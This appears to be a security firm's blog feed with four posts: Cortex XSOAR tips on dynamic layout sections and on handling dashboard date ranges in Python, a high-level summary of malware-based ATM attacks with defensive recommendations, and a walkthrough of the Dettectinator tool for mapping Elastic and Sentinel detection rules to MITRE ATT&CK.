Cortex XSOAR Tips & Tricks – Leveraging dynamic sections – text

10 February 2023 at 09:00

Introduction

Cortex XSOAR is a security oriented automation platform, and one of the areas where it stands out is customization.

A recurring problem in a SOC (Security Operation Center) is data availability. As a SOC Analyst, doing a thorough analysis of a security incident requires having access to many pieces of information in order to acquire context on the events you are investigating. In a less mature SOC, this information is at best scattered across many tools, and at worst hardly available. This can be overcome by using multiple data sources to ingest contextual information into your Security Orchestration, Automation and Response (SOAR) platform. In turn, this allows you to provide a single pane of glass to the analysts, who can then focus on meaningful work and eliminate data collection from their daily tasks.

Objectives

In this blogpost, we will focus on the use of dynamic sections to customize layouts in Cortex XSOAR. We will show that they can be used to display raw incident data for debugging purposes without cluttering the main workplace of our analysts.

A dynamic section is a layout element which you can add to a layout tab for either an incident or an indicator.
The fundamental difference between it and most other available layout elements is that it is not bound to displaying incident fields or fields of indicators related to the current incident on display, but instead is purely automation based.
This means that upon being rendered, a dynamic section executes an automation, and it is both the specific format and output of that automation that dictates the style and content that will be rendered.
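
As a minimal sketch (not taken from the NVISO codebase), an automation backing a General Purpose Dynamic Section can be as simple as returning a markdown entry, which the layout element will render:

# Minimal dynamic section sketch: whatever this automation returns is rendered in the layout
incident = demisto.incident()
name = incident.get("name", "unknown") if isinstance(incident, dict) else "unknown"
return_results(CommandResults(readable_output=f"### Hello from incident: {name}"))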

This is not unlike the behavior of field display scripts, but these will be covered in a later post.

Real World Example

As part of our operations as an MSSP (Managed Security Services Provider), we are often faced with alert ingestion issues or mishaps.

One way these occur is that an alert will be fetched into Cortex XSOAR but some of its important features will not have been picked up by our extraction logic. This could materialize as missing fields in indicators or missing indicators altogether. We may, for example, have received an alert for suspicious actions taken by a user, yet that very user was not added to the incident as an indicator, nor were details about these actions.

Incident Info tab of a Cortex XSOAR incident – the name of the incident points to unsanctioned cloud app usage by a user, but neither information about the user nor about the unsanctioned app was extracted.

This could happen in many different ways, most commonly because the exact data scheme used by the tool that generated the alert has changed. When this happens, the information we want to extract is present in the alert we fetch; it’s just not located where we’re used to finding it. In such cases, a manual inspection of the raw data that came in is sufficient to identify where the data we want can be found. However, as shown in the next screenshot, manually inspecting the raw data of an incident is not that user-friendly in Cortex XSOAR.

View of the “Context Data” of an Cortex XSOAR incident – the presentation of the available data is unsuitable for manual inspection

To make it easier, we built our own dynamic section, which displays curated data from both the labels and some entries of an incident. The result is as follows:


In this example, Azure Active Directory identifiers are available and can be leveraged to get the details of the involved user. In a similar manner, the Cloud Application Id is available.

Our dynamic section is powered by an automation that enumerates the labels of the current incident.

ret_labels = {}
incident = demisto.incident()
labels = incident.get("labels") if isinstance(incident, dict) else None
if not isinstance(labels, (list, List)):
	labels = []
for label in labels:

Similarly, it also enumerates specifically tagged war room entries.

ret_notes = {}
investigation_id = demisto.incident()["id"]
uri = f"investigation/{investigation_id}"
body = {
	"pageSize": 100,
	"categories": [],
	"tags": ["raw_data"],
	"notCategories": [],
	"usersAndOperator": False,
	"tagsAndOperator": False,
}
body = json.dumps(body, indent=4)
args = {"uri": uri, "body": body}
res_cmd = demisto.executeCommand("demisto-api-post", args)
for res in res_cmd:
	if not (isinstance(res, dict) and isinstance(contents := res.get("Contents"), dict)):
		continue
	if not isinstance(response := contents.get("response"), dict):
		continue
	if not isinstance(entries := response.get("entries"), (list, List)):
		continue
	for entry in entries:

Once the incident labels are fetched, we extract their contents:

for label in labels:
	if not isinstance(label, dict):
		continue
	label_type, label_value = label.get("type"), label.get("value")
	if not (isinstance(label_type, str) and isinstance(label_value, str)):
		continue
	try:
		label_value = json.loads(label_value)
	except Exception:
		pass
	try:
		ret_labels.update({label_type: label_value})
	except Exception:
		pass

In a similar fashion, for each returned War Room entry, we extract the name of the parent playbook task and the content of the entry:

for entry in entries:
	key = ""
	if not isinstance(entry, dict):
		continue
	if isinstance(entry_id := entry.get("id"), str):
		key += entry_id
	if isinstance(entry_task := entry.get("entryTask"), dict):
		if isinstance(task_name := entry_task.get("taskName"), str):
			key += " - " + task_name
	value = None
	if isinstance(cnt := entry.get("contents"), str):
		try:
			value = json.loads(cnt)
		except Exception:
			value = cnt
	ret_notes.update({key: value})

To tie it all up, and because our goal is to offer a tree-like navigable output, we structure our outputted data into a dictionary.

ret = {
	"notes": ret_notes,
	"labels": ret_labels
}

At that point, we cannot just output this dictionary as is; we need to encapsulate it in a way that will indicate to the layout that we want this layout element to be shown as a JSON tree.

results = CommandResults(raw_response = ret)
return_results(results)

By now, our code is good to go and all we need to do is to edit our incident layout to add a new tab and create a new dynamic section powered by the automation we just built.

In Cortex XSOAR, navigate to Settings, Objects setup, Layouts, and either modify an existing layout or create your own. From there you can add a new General Purpose Dynamic Section.

Once your General Purpose Dynamic Section is added to your layout tab, you can edit it and choose the automation it executes. If your automation does not show up in the list of available ones, make sure you added the “dynamic-section” tag to it.

In this blog post, we have shown you how to display complex data in an incident layout which can be used by a security analyst to provide more context. In future posts, we will present more detailed context additions that tie in nicely with the Cortex XSOAR user interface.

References

Palo Alto Cortex XSOAR documentation: how to add a custom widget to the incident and indicator pages

Microsoft Sentinel Cloud Application Entity Identifiers

About the author

Benjamin Danjoux

Benjamin is a senior engineer in NVISO’s SOAR engineering team. As the SOAR engineering design lead, he is responsible for the overall architecture and organization of the automated workflows running on Palo Alto Cortex XSOAR, which enables the NVISO SOC analysts to detect attackers in customer environments.

Cortex XSOAR Tips & Tricks – Dealing with dates

25 January 2023 at 09:00

Introduction

As an automation platform, Cortex XSOAR fetches data that represents events set at defined moments in time. That metadata is stored within Incidents, will be queried from various systems, and may undergo conversions as it moves from machines to humans. With its various integrations, Cortex XSOAR ingests datetimes from sources that use different standards, yet manages to keep track of all of them.

Objectives

In this blog post, we will go over dates in Cortex XSOAR, showing where they are presented and used, as well as how they are stored and passed around.
We will present a real-world use case for extracting the dates being passed to the elements of a dashboard. With that in mind, we will go deeper into the technicalities of passing timeframes to widgets and present an object-oriented approach to interpreting and converting those, ensuring that this becomes an easy process, even when using third-party tools.
The codebase for this post is available on the NVISO Github Repository.

Dates in XSOAR

Let’s look at the use of dates in Cortex XSOAR throughout the GUI and let’s pay attention to the formats we encounter:
Within incident layout tabs, incident fields of type “date” are formatted in a human readable way.

Occurrence, Creation, and Last update dates in the Timeline Information GUI widget of an XSOAR Incident.

However in the raw context of an Incident, we see the same dates but stored in the ISO 8601 format:

Multiple datetime fields in the Context GUI of an XSOAR Incident

The dates we can observe in the raw context are formatted to be machine readable; this is what Integrations, Automations, and Playbooks read.

The dates visible in the layout tab are rendered live from those in the context. Cortex XSOAR adapts this view depending on the preferred timezone of the current user, which is saved in their user profile. This explains the 1-hour difference between the raw dates and their human-readable counterparts in our examples above.
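
The following sketch illustrates that rendering step in plain Python; Europe/Brussels is just an assumed example timezone for the user profile:

from datetime import datetime
from zoneinfo import ZoneInfo

raw = "2023-01-25T08:00:00Z"  # as stored in the context (UTC)
utc_date = datetime.fromisoformat(raw.replace("Z", "+00:00"))
local_date = utc_date.astimezone(ZoneInfo("Europe/Brussels"))
print(local_date)  # 2023-01-25 09:00:00+01:00 -> the 1-hour difference seen in the layout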

Moving on to the dashboards page, we get a time picker to selectively view Incident and Indicator data restricted to a given period of time. In the next part, we will find out how this time frame is passed down to the underlying code generating the tables and graphs that make up the dashboard. For that purpose, we will build a new dashboard composed of a single automation-based widget.

Date Range Selector of a XSOAR Dashboard, set to display information from the “Last 7 Days”

The dashboard date picker

We just saw that dashboards introduce a date picker element; it lets you select both relative timeframes such as “Last 7 days” and explicit timeframes where you define two precise dates in time. To find out how this is effectively passed down, we will use an automation-based widget and dump the parameters provided to this automation.

If you need help on creating an automation, please refer to the XSOAR documentation on automations.

Let’s create an automation with the following code, not forgetting to add a ‘widget‘ tag to it.

import json
demisto.results(json.dumps(demisto.args()))

The snippet above will print the arguments passed down to the automation.

To run our automation and get its output, we need to create a new dashboard and add a text element to it; its content will be populated by our automation. For help on creating a dashboard and automation based widgets, please refer to XSOAR – add a widget to a dashboard and XSOAR – creating a widget automation.

We start our reversing effort by using the dashboard with an explicit timeframe:

Dashboard output with the date range “19 Apr 2022 – 22 Apr 2022”

At first glance, we identify the two arguments that interest us, “from” and “to”, each containing an ISO 8601 string corresponding respectively to the lower and higher bounds of our selected timeframe.
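
For an explicit range such as the one above, the automation therefore receives arguments roughly shaped like this (the values are illustrative, not the exact output of the screenshot):

args = {
    "from": "2022-04-19T00:00:00Z",
    "to": "2022-04-22T00:00:00Z"
}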

When we use relative dates, we still get ISO 8601 strings. However, the “to” argument now holds a default value pointing to January 1st of year 1.

Dashboard output with the date range “Last 6 months”

Finally, when we use the ‘All dates’ date picker, we get two of these arbitrary strings.

Dashboard output with the date range “All times”

The findings above can be understood as a standard for passing dates and time frames, and we can assume that all built-in Cortex XSOAR content can handle it. However, this may not be the case for third-party tools. To interface with the latter, and to create our own dashboard-compatible content, we need a way to interpret these dashboard parameters.

Objectives redefinition

We have now identified how the dates that define the beginning and the end of a date range are passed to the elements of a dashboard after a user selects that date range in the web interface. This opens new capabilities, as we are no longer bound to dashboard elements built into Cortex XSOAR, but can start to imagine querying period-relevant data in third-party systems to visualize in our dashboard.

In a future post, we will use our findings to query Microsoft Sentinel for some Incident data, and display the results of that search in dashboards, as well as within incidents. However, a first hurdle will be that not every system we interact with will blindly accept the from and to fields that Cortex XSOAR passes on to us, especially if we get one of those special values. We will first have to come up with a software wrapper that will let us obtain date objects that we can more easily manipulate in Python.

A proposal for interpreting dates in XSOAR

To use the dates stored in our Cortex XSOAR Incidents, and to build our own automation-based dashboard widgets, we have come up with an object-oriented wrapper.
This wrapper introduces classes to describe both these explicit datetimes and their relative counterparts, as well as factories to craft these out of standard XSOAR parameters.

The following snippet describes the different classes:

from abc import ABC
from datetime import datetime

class NitroDate(ABC):
    pass

class NitroRegularDate(NitroDate):
    def __init__(self, date: datetime = None):
        self.date = date

class NitroUnlimitedPastDate(NitroDate):
    pass

class NitroUnlimitedFutureDate(NitroDate):
    pass

class NitroUndefinedDate(NitroDate):
    pass

NitroDate is an empty parent class, with 4 child classes:

  • NitroRegularDate
  • NitroUnlimitedPastDate
  • NitroUnlimitedFutureDate
  • NitroUndefinedDate

NitroRegularDate represents an explicit date, and stores it as a datetime object.

NitroUnlimitedPastDate and NitroUnlimitedFutureDate are both representations of the special date January 1st year 1, but reflect the context they were mentioned in.

NitroUnlimitedPastDate represents that special value having been passed from a “from” argument, such as with the “Up to X days ago” time picker.

NitroUnlimitedFutureDate represents that special value having been passed from a “to” argument, such as with the “From x days ago” time picker.

Finally, NitroUndefinedDate represents either the special value when we cannot identify the argument it was passed from, or the fact that we could not properly parse a date given in input.

Now that we’ve defined the classes we will use to represent our datetimes, we need to build them, preferably from the data supplied by Cortex XSOAR.

from abc import ABC
from datetime import datetime, timezone
from enum import Enum
import dateutil.parser

class NitroDateHint(Enum):
    Future = 1
    Past = 2
# an Enum used as a flag for functions that build NitroDates


class NitroDateFactory(ABC):
    """this class is a factory, as in it's able to generate NitroDates from a variety of initial arguments"""
    @classmethod
    def from_iso_8601_string(cls, arg: str = ""):
        """
        this function is able to create a NitroDate from an iso 8601 datestring
        :param arg: the iso 8601 string
        :type arg: str
        """
        try:
            date = dateutil.parser.isoparse(arg)
        except Exception as e:
            raise NitroDateParsingError from e
        return NitroRegularDate(date=date)

    @classmethod
    def from_regular_xsoar_date_range_arg(cls, arg: str = "", hint: NitroDateHint = None):
        """
        this function is able to create a NitroDate from a single argument passed by
        a xsoar GUI element and a Hint
        :param arg: the iso 8601 string or cheatlike string
        :type arg: str
        :param hint: a hint to know whether the date, if a predetermined value, should be interpreted as future or past
        :type hint: NitroDateHint
        """
        if arg == "0001-01-01T00:00:00Z":
            if hint is None:
                return NitroUndefinedDate()
            elif hint == NitroDateHint.Future:
                return NitroUnlimitedFutureDate()
            elif hint == NitroDateHint.Past:
                return NitroUnlimitedPastDate()
        else:
            return cls.from_iso_8601_string(arg=arg)

    @classmethod
    def from_regular_xsoar_date_range_args(cls, the_args: dict) -> (NitroDate, NitroDate):
        """
        this function is able to create NitroDates from the two arguments passed by
        a xsoar GUI element
        :param the_args: the args passed to the xsoar automation by the timepicker GUI element
        :type the_args: dict
        """
        ret = [NitroUndefinedDate(), NitroUndefinedDate()]
        if isinstance(the_args, dict):
            for word, i, hint in [("from", 0, NitroDateHint.Past), ("to", 1, NitroDateHint.Future)]:
                if isinstance(tmp := the_args.get(word, None), str):
                    nitro_date = cls.from_regular_xsoar_date_range_arg(arg=tmp, hint=hint)
                    # print(f"arg={tmp}, hint={hint}, date={nitro_date}")
                    if isinstance(nitro_date, NitroDate):
                        ret[i] = nitro_date
        return ret

The factory presented above eases work during the development of a dashboard widget by allowing us to get two NitroDates with this simple call:

FromDate, ToDate = NitroDateFactory.from_regular_xsoar_date_range_args(demisto.args())

The following screenshot demonstrates the use of this factory function and the type and value of its outputs when run against Cortex XSOAR data:

Screenshot of PyCharm showcasing the use of from_regular_xsoar_date_range_args

From there on, we can check the types of FromDate and ToDate and more easily build logic to query third-party systems. At that stage, the wrapper correctly identifies the datetimes and timeframes, which it returns as standardized Python objects, whether they were passed down in a function call or stored in an incident, and is able to detect errors in their formatting.
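
As a small sketch of what that logic could look like (assuming the to_iso8601() helper that NitroRegularDate exposes in the NVISO repository), a widget could translate the NitroDates into optional ISO 8601 bounds for a third-party query:

# Sketch: turn NitroDates into optional ISO 8601 bounds (None = no bound on that side)
from_iso = None
to_iso = None

if isinstance(FromDate, NitroRegularDate):
    from_iso = FromDate.to_iso8601()
elif isinstance(FromDate, NitroUndefinedDate):
    raise ValueError("could not interpret the 'from' date passed by the dashboard")

if isinstance(ToDate, NitroRegularDate):
    to_iso = ToDate.to_iso8601()
elif isinstance(ToDate, NitroUndefinedDate):
    raise ValueError("could not interpret the 'to' date passed by the dashboard")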

In a future post, we will use this mechanism to query external APIs in a Cortex XSOAR dashboard.

References

NVISO Github Repository

ISO 8601

XSOAR documentation on automations

XSOAR – add a widget to a dashboard

XSOAR – creating a widget automation

About the author

Benjamin Danjoux

Benjamin is a senior engineer in NVISO’s SOAR engineering team.
As the SOAR engineering design lead, he is responsible for the overall architecture and organization of the automated workflows running on Palo Alto Cortex XSOAR, which enables the NVISO SOC analysts to detect attackers in customer environments.

Malware-based attacks on ATMs – A summary

10 January 2023 at 08:00

Introduction

Today we will take a first look at malware-based attacks on ATMs in general, while future articles will go into more detail on the individual subtopics.

ATMs have been robbed by criminal gangs around the world for decades. An approach that has been successful for roughly 20 years is the use of highly flammable gas, which is fed into the ATM safe and ignited during a robbery. For an attacker, this is an inexpensive way to get the cash, but it also generates a lot of publicity and thus a higher risk of being caught by security authorities. In addition, more and more ATMs are being equipped with systems that ink the money as soon as the machine is physically breached.

Since the beginning of the 2010s, there has been a trend for more and more criminal gangs to switch to non-violent methods without explosives. We are talking about so-called physical malware attacks. Here, malicious software is brought onto the PC inside the ATM, for example via a USB stick. This malware-based attack usually results in all cash inside the safe being ejected via the regular dispensing mechanism (cash-out attack). A successful attack effectively puts the malware in full command of the ATM, making it almost impossible to stop.

Another aspect that cannot be ignored is that an infected ATM often enables attacks on other devices or services within the network. For example, for research and testing purposes, we were able to develop malware that attacked all ATMs within the network from an infected device (the initial ATM). The result was simultaneous cash withdrawal from all ATMs within the shared network. It was also interesting that other devices connected to the same network, such as a Raspberry Pi, could achieve the same results.

Even though such malware-based attacks on ATMs decreased during the Covid pandemic in 2020, a clear increase has been visible since the beginning of 2022. Malware to attack specific types of devices can be purchased today for about 1,000 USD on the darknet.

To protect against such attacks, it is necessary to prevent malware from being installed and executed. Through years of research and experience in real projects, we have been able to help ATM manufacturers and banks protect their devices from such attacks.

ATM Internals

Generally, an ATM consists of two components:

Safe

  • Includes:
    • Cash dispenser
    • Cassettes containing banknotes
  • Strongly protected by heavy locks and armored walls

Cabinet

  • Includes the computer connected to other devices:
    • Card reader
    • Pin pad
    • Touch screen
    • Network components
    • etc.
  • Mostly weakly protected from physical attack.
    • Unarmored: Door and walls are often made of thin plastic or sheet metal.
    • Poor quality locks: locks are often no better than those on private mailboxes, which can be opened in seconds with a lockpick.
    • Often only one key for several ATMs is used.

The computer inside the cabinet usually runs on the Windows operating system, which in turn runs the application for legitimate use of the ATM. A user / bank customer should not be able to break out of this application (e.g. via the touchscreen) to access the underlying system. For this purpose, Windows generally runs in the so-called Kiosk mode, which limits the input options only to the necessary user functions within the application.

Input entered in the user application via the touchscreen or PIN pad, for example, is processed by the software and then transmitted to other devices such as the cash dispenser via corresponding commands. This communication between the user application and internal devices takes place via the XFS standard (Extensions for Financial Services). This standard provides an API through which applications can access the peripheral devices via the Windows hardware manager.

When the user initiates a transaction such as a cash withdrawal, the bank’s processing center is also contacted, which validates the transaction and ultimately transmits the confirmation for withdrawal. The connection between the ATM and the processing center is generally made via a cable, but occasionally also wirelessly (WiFi or GSM).

Overview ATM internals

Overview ATM

Vulnerabilities to ATM malware

In general, we classify ATM vulnerabilities regarding malware attacks into three categories. The combination of vulnerabilities from these categories allows an attacker to dispense all cash or attack other systems on the same network in many cases.

Insufficient physical security

The first step for malware-based attacks is usually to open the cabinet in order to interact with the integrated computer via a plugged-in keyboard or special USB stick. Here, we came into contact with recurring security vulnerabilities in various assessments:

  • The lock of the cabinet is insecure and can be opened with a lockpick within seconds.
  • The housing (door and walls) are made of thin plastic or sheet metal and can be destroyed with minor effort.
  • Locks from different ATMs can be opened with the same key. If an attacker obtains such a master key, they can often open all the ATMs in different branches.
  • The keys are not secure against copying. If an attacker obtains a key, it can be copied as often as desired.
  • Lack of security for e.g. USB interfaces. If an attacker succeeds in opening the cabinet, they will in almost all cases find unprotected (open) USB interfaces that allow interaction via keyboard.

Computer inside the cabinet with open USB ports

Insufficient configuration of the system and peripheral devices

It is often the case that the XFS standard for communication between OS and peripherals is configured very insecurely. There is often no authentication at all between the peripherals and the OS. An attacker with access to the computer could execute malware to communicate with the cash dispenser, and thus cash-out all available money. In summary, we found the following recurring security flaws in the system and device configurations:

  • Insufficient or even missing authentication between USB peripherals and the OS, which allows so-called ATM black-box attacks.
  • Lack of communication encryption between OS and peripherals. An attacker can thus often read sensitive card data and transactions of the user.
  • Lack of hard disk encryption. An attacker can extract and read any hard disk content. In addition to various software that can be misused to further develop malware, we were also able to extract unencrypted videos and pictures of customers that were taken via the camera integrated in the ATM.
  • Inadequate protection of the kiosk mode. If an attacker manages to open the cabinet and plug in a keyboard, they can often break out of the banking application using special keyboard shortcuts and thus access the underlying Windows system. However, in some cases this is also possible via the touch screen of the machine without having to open the cabinet.
  • Boot from external storage media. ATMs are occasionally configured to boot from an attached storage medium such as a USB stick when they are restarted. If an attacker can boot into an alternative system in this way, hard disk contents can be completely extracted, or the attacker can even communicate directly with peripherals such as the cash dispenser.
  • Inadequate or missing application control configuration. Today’s malware or public enumeration tools are often executed via Powershell scripts or exe files. In many of our assessments, the case was that the execution of such software was insufficiently blocked or not blocked at all.
  • Weak or missing AV solutions. The installation and execution of tools and malware is often insufficiently detected, or not detected at all, because weak AV software is used for protection or it is not kept up to date.

ATM allows breaking out of the banking application using a connected keyboard, exposing that the current user has full administrative access.

Insufficient network security

An attacker with access to the ATM’s network interface (e.g. Ethernet) can attack other systems or services within the network. In one of our scenarios, it was even possible to dispense cash from all ATMs within the network. In general, such scenarios are based on the following vulnerabilities:

  • Lack of or insufficient network access control. An attacker who has been able to connect to the ATM network via Ethernet often has full authorization to communicate with other systems on the same network. In many cases, infiltration of other devices or even the Active Directory is possible.
  • Unencrypted communication to the backend. An attacker in a man-in-the-middle position between the processing center and the ATM can read sensitive transaction data, but can also manipulate it to trigger illegitimate cash dispensing.
  • Lack of or insufficient authentication to the exposed ATM network service. Often, crafted (spoofed) backend commands can be sent to the exposed ATM service to make it cash out.

Example – Bypassing outdated NAC (Network Access Control) with public tools

Attack Scenarios

Due to the large number of possible vulnerabilities, individual malware-based attack scenarios often arise. The following figure shows general attack scenarios, which are also performed in our assessments.

Overview - Attack scenarios

Recommendations

In general, it is difficult to make all-encompassing recommendations for securing ATMs. Even in our current assessments, we are increasingly confronted with new and very individual security vulnerabilities. However, we can make general recommendations for securing ATMs against malware attacks, as some vulnerabilities are present on a regular basis:

  • The computer should be in the safe. Securing the computer in the safe would probably be the best possible protection against malware-based attacks. Unfortunately, we have not seen such protection in any of our analyses so far.
  • If it is not possible to place the computer in the safe:
    • The cabinet housing and door should also be made of solid material. It should not be possible to open the lock of the cabinet using a lockpick. Generally, security locks or even digital locks with proper auditing possibilities should be used here. The cabinet of each ATM should only be able to be opened with an individual key.
    • Network devices such as switches should not be placed outside the ATM.
  • All communication between ATM and backend should be encrypted according to current standards.
  • All transactions between the ATM and the backend should be mutually authenticated for example using TLS mutual authentication.
  • All unused services exposed by the ATM should be turned off.
  • The firewall between the ATM and backend should be configured to allow remote access only to the service that is needed. All network services that are not needed should be turned off.
  • Remote access should follow strict password policies or even better: key-based authentication mechanisms.
  • Any communication between the OS and peripherals such as the cash dispenser should be encrypted. Here the ATM vendor can be consulted since it is usually a simple configuration that can be enabled.
  • The OS as well as used applications should be updated regularly including hotfixes.
  • It should not be possible to connect any peripheral (e.g. keyboard) to the computer and use it. One possibility would be to use local OS policies or third-party software to allow only explicit devices. However, one should be careful with such whitelisting, as the device IDs themselves can be spoofed.
  • The execution of scripts or other software should be limited as much as possible and be restricted to only what is necessary. One possibility would be the use of Windows Applocker.
  • Any software that is not needed (e.g. software used for development) should be removed.
  • Hard disks should be fully encrypted.
  • Access to the BIOS should be protected by e.g. setting a strong password.
  • Booting from the hard disk of the ATM should be enforced. It should not be possible to access the boot menu without authentication. In addition, make sure to enable measured boot.
  • AV solutions should be used and regularly updated. In general, we prefer the use of Windows Defender over third-party software.
  • Abnormal behavior or communication, both on the network and with peripherals, should be logged and alerts should be triggered.

Conclusion

Malware-based attacks that rely on physical access are becoming increasingly popular. Today, we can already see some security improvements in current assessments. However, our experience shows that the improvement over the last years is still insufficient. Many protections could still be circumvented to exploit initial vulnerabilities. This is usually not because manufacturers and banks deliberately avoid security precautions, but because the whole environment and its processes often do not allow simple security upgrades. Some examples are that to ensure proper network access control (NAC), all switches within all branches would have to be replaced, technical staff still needs an interface (e.g. USB) to perform administrative tasks on the ATM, etc.

In general, it turns out that criminal hacker gangs are always one step ahead and find ways to bypass current security measures.

About the Author

Alexander Poth

Alexander is a senior security consultant at NVISO. He regularly performs a variety of assessments, including IoT and embedded devices, Web and Mobile applications.

DeTT&CT: Automate your detection coverage with dettectinator

4 January 2023 at 08:08

Introduction

Last year, I published an article on mapping detection to the MITRE ATT&CK framework using DeTT&CT. In the article, we introduced DeTT&CT and explored its features and usage. If you missed it, you can find the article here.

However, after writing that article, I encountered some challenges. For instance, I considered using DeTT&CT in a production environment, but there were hundreds of existing detection rules to consider, and it would have been a tedious process to manually create the necessary YAML file for building a detection coverage layer. As a result, I decided not to use DeTT&CT and instead focused on increasing detection in other ways.
Fortunately, a new tool called Dettectinator has recently been released. Its purpose is to address these kinds of issues and make it easier to automate detection coverage.

In this article, we will explore Dettectinator, its features, and walk through the steps to automate the detection coverage for Sentinel Analytics rules and Elastic detection rules.

What is dettectinator

Dettectinator is a tool developed by Martijn Veken and Ruben Bouman of Sirius Security that automates the creation and maintenance of the DeTT&CT data source and technique administration YAML files needed to create visibility and detection layers in the ATT&CK Navigator. This tool can be integrated as a Python library within your security operations center (SOC) automation tools or used via the command line.

To use the Python library, install it with “pip install dettectinator” and import one of the following classes into your code:

  • DettectDataSourcesAdministration
  • DettectTechniquesAdministration

These classes allow you to programmatically edit DeTT&CT YAML files, including creating new data source and techniques administration files and modifying existing ones.

from dettectinator import DettectDataSourcesAdministration
from dettectinator import DettectTechniquesAdministration

# Open an existing YAML file:
dettect_ds = DettectDataSourcesAdministration('data_sources.yaml')

# Or create a new YAML file:
dettect_ds = DettectDataSourcesAdministration()

# Open an existing YAML file:
dettect = DettectTechniquesAdministration('techniques.yaml')

# Or create a new YAML file:
dettect = DettectTechniquesAdministration()

To run as a CLI tool:

$ python dettectinator.py

Please specify a valid data import plugin using the "-p" argument:
 - DatasourceCsv
 - DatasourceDefenderEndpoints
 - DatasourceExcel
 - DatasourceWindowsSecurityAuditing
 - DatasourceWindowsSysmon
 - TechniqueCsv
 - TechniqueDefenderAlerts
 - TechniqueDefenderIdentityRules
 - TechniqueElasticSecurityRules
 - TechniqueExcel
 - TechniqueSentinelAlertRules
 - TechniqueSigmaRules
 - TechniqueSplunkConfigSearches
 - TechniqueSuricataRules
 - TechniqueSuricataRulesSummarized
 - TechniqueTaniumSignals
$ python3 dettectinator.py -p TechniqueElasticSecurityRules -h

Plugin "TechniqueElasticSecurityRules" has been found.
usage: dettectinator.py [-h] [-c CONFIG] -p PLUGIN -a APPLICABLE_TO [-d {enterprise,ics,mobile}] [-i INPUT_FILE] [-o OUTPUT_FILE] [-n NAME] [-s STIX_LOCATION] [-ch] [-cl] [-ri RE_INCLUDE] [-re RE_EXCLUDE]
                        [-l LOCATION_PREFIX] [-clp] --host HOST --user USER --password PASSWORD [--filter FILTER]

Dettectinator provides a range of plugins for various detection systems and data source platforms, and you can even create custom plugins to suit your specific workflow. Some of the available plugins for detection include:

  • Microsoft Sentinel: Analytics Rules (API)
  • Microsoft Defender: Alerts (API)
  • Microsoft Defender for Identity: Detection Rules (loaded from MS Github)
  • Tanium: Signals (API)
  • Elastic Security: Rules (API)
  • Suricata: rules (file)
  • Suricata: rules summarized (file)
  • Sigma: rules (folder with YAML files)
  • Splunk: saved searches config (file)
  • CSV: any csv with detections and ATT&CK technique ID’s (file)
  • Excel: any Excel file with detections and ATT&CK technique ID’s (file)

Plugins for data sources include:

  • Defender for Endpoints: tables available in Advanced Hunting (based on OSSEM)
  • Windows Sysmon: event logging based on Sysmon (based on OSSEM and your Sysmon config file)
  • Sentinel Window Security Auditing: event logging (based on OSSEM and EventID’s found in your logging)
  • CSV: any csv with ATT&CK data sources and products (file)
  • Excel: any Excel file with ATT&CK data sources and products (file)

It’s easy to create your own Dettectinator plugins or edit the ones provided to cover additional scenarios. Instructions on how to create your own plugins can be found here.

Dettectinator can be seamlessly integrated into your detection engineering workflow, as illustrated in the picture below. Steps 1 and 3 can be automated using version control system (VCS) pipelines or scheduling. The analyst can enhance the techniques identified by Dettectinator by assigning appropriate scores, resulting in an enriched YAML file that can be used in future runs of the tool.

Dettectinator workflow
Figure 1: Dettectinator workflow
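As a minimal sketch of such a scheduled run, a nightly cron entry could re-generate the technique administration file using the CLI. This simply reuses the Elastic Security plugin command covered in the next section; the installation path, output path and credentials are placeholders:

# Refresh the technique administration YAML every night at 02:00
0 2 * * * cd /opt/dettectinator && python3 dettectinator.py -p TechniqueElasticSecurityRules -a Windows -o /data/elasticrules_techniques.yaml --host "<URL>:<Port>" --user <username> --password <password>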

How to use dettectinator

To illustrate how to use Dettectinator from a production environment, we will walk through the steps to build your coverage from Elastic Security detection rules and Microsoft Sentinel analytics rules.

Let’s start with Elastic Security. As shown in the picture below, we enabled the built-in detection rules from Elastic which represent 724 rules in total.

Elastic Security detection rules
Figure 2: Elastic Security detection rules

Ensure that the Elastic user has the appropriate permissions to manage/read the detection rules. Refer to the Elastic documentation for more information.

In our testing environment, we created a dedicated user and assigned it a custom role (as shown in the highlighted parameters):

Elastic detection permissions role
Figure 3: Elastic detection permissions role

With the command below, we will generate the technique administration YAML file which we will use to create the ATT&CK Navigator layer:

$ python3 dettectinator.py -p TechniqueElasticSecurityRules -a Windows -d enterprise -o elasticrules_techniques.yaml --host "<URL>:<Port>" --user <username> --password <password>
  • -p: specify the plugin
  • -a: Systems that the detections are applicable to (comma separated list)
  • -d: ATT&CK domain to use {enterprise, ics, mobile} (default = enterprise)
  • -o: YAML filename for output
  • --host: Elastic Security host
  • --user: Elastic Security username
  • --password: Elastic Security user’s password
Dettectinator Elastic Security Rules plugin
Figure 4: Dettectinator Elastic Security Rules plugin

Using the DeTT&CT Editor, we were able to modify the technique administration YAML file. Alternatively, we could use the output to generate a detection ATT&CK Navigator layer through the DeTT&CT Command Line Interface (CLI).

DeTT&CT Editor
Figure 5: DeTT&CT Editor

To generate the detection layer, we used the following command:

$ python3 dettect.py d -ft <YAML file generated by dettectinator> -l
  • d: detection coverage mapping based on techniques
  • -ft: path of the technique administration YAML file
  • -l: generate a detection layer file for the ATT&CK Navigator

The tool dettect.py generated a JSON file that can be opened within ATT&CK Navigator.

In this case, we get a quick overview of the built-in Elastic Security detection rules. All techniques are assigned a default score of ‘1’ by dettectinator. This scoring can be customized using the DeTT&CT Editor.

Detection coverage layer
Figure 6: Detection coverage layer

When hovering over the ATT&CK techniques and sub-techniques, additional information such as related detection rules and comments generated by dettectinator will appear.

Here is an example for the technique Lateral Tool Transfer (T1570):

Detection layer - details
Figure 7: Detection layer – details

Now, let’s check the detection coverage from an existing Microsoft Sentinel environment with Analytics rules.  In our testing example, we created an “App Registration” in Azure and granted it the following permissions:

App Registration permissions
Figure 8: App Registration permissions

Since we are using delegated permissions, we also had to enable “Allow public client flows” in the Authentication settings for the App Registration.

To generate the technique administration YAML for Microsoft Sentinel, we used the following command:

$ python3 dettectinator.py -p TechniqueSentinelAlertRules -a Windows -o sentinel_techniques.yaml --subscription_id <subscription_id> --resource_group <resource group name> --workspace <workspace name> --tenant_id <tenant_id> --app_id <app_id>
Dettectinator - Microsoft Sentinel Techniques
Figure 9: Dettectinator – Microsoft Sentinel Techniques

Dettectinator generated a YAML file containing information about a single technique. As shown in the picture below, our test Microsoft Sentinel environment contains 5 analytics rules, but only one of them has a technique specified in the metadata. As a result, Dettectinator was able to map the analytics rules to only one technique (T1190).

Microsoft Sentinel Analytics Rules
Figure 10: Microsoft Sentinel Analytics Rules
Microsoft Sentinel detection coverage
